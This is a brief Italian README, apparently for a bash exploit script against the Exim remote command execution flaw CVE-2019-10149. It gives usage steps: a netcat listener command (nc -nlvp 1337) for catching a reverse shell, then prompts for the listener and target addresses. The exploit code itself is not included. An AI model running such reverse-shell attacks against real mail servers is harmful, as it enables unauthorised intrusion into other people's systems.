
Esecuzione remota di comandi in una shell da un servizio exim vulnerabile.
Esecuzione remota di comandi in una shell da un servizio exim vulnerabile.
Le versioni vulnerabili vanno dalla 4.87 alla 4.91 (incluse). Controlla https://nvd.nist.gov/vuln/detail/cve-2019-10149.
Il seguente script è basato sul PoC di Qualys. Controlla https://packetstormsecurity.com/files/153218/Exim-4.9.1-Remote-Command-Execution.html.
2 terminali consigliati
T1 $ nc -nlvp 1337
T2 $ bash exploit.sh
$ Listener IP: 192.168.0.1
$ Listener Port: 1337
$ Exim IP: 10.10.0.1
$ Exim Port: 25